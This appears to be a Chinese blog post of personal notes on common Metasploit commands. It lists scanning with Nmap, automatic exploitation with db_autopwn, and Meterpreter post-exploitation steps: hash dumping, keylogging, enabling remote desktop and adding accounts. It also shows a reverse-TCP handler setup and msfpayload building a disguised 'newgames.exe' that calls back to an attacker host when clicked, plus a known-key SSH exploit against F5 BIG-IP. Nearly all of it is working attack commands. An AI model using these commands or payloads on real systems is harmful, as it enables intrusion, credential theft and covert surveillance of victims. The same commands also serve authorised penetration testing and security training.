msf metasploit一些常用命令
笔记上记得 先放上来 慢慢补充
rdesktop ip 远程桌面


msfconsole

hosts 数据库
host -d 删除所有数据

db_nmap -T Aggressive -sV -n -O -v
nmap -sS -Pn 192.168.1.1 // -sS 使用它来进行一次隐蔽的TCP 扫描 -Pn 它会告诉nmap 不使用ping 来预先确认主机属否存活

调用nmap扫描 -T Aggressive 快速扫描 -o判断造作系统 -sv服务及版本 -v 详细消息

db_service 查看服务

load db_autopwn.rb

db_autopwn 自动攻击 db_autopwn -p -t -e -I指定目标

db_autopwn -p -t -e -r

-e 是开始攻击,-t 是列出所有的匹配的模块,-r 是使用一个反弹式的
shell –p 是在端口的基础上来选择攻击模块

sessions -i 查看活动连接
sessions -i id 连接
getuid 查看权限
sysinfo 查看系统信息
run hashdump 导出帐号
ps 查看系统进程
migrate 进程uid 进入某个进程 迁移进程
keyscan_start 键盘扫描 键盘记录
keyscan_dump 输出键盘记录
keyscan_stop
run getgui -e 打开远程桌面
run getgui -u 用户名 -p 密码 添加用户

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 反向tcp连接
set LHOST 10.1.1.1
set LPORT 33333
exploit

制造离线攻击
cd /pentest/exploits/frameworks3
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=33333 X > /tmp/newgames.exe
建立文件 点击后 自动连接 10.1.1.1 33333端口

选择模块攻击

search 关键词
use exploit/linux/ssh/f5_bigip_known_privkey
show options
set RHOST ip
set RPORT 端口
set payload cmd/unix/interact
exploit

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。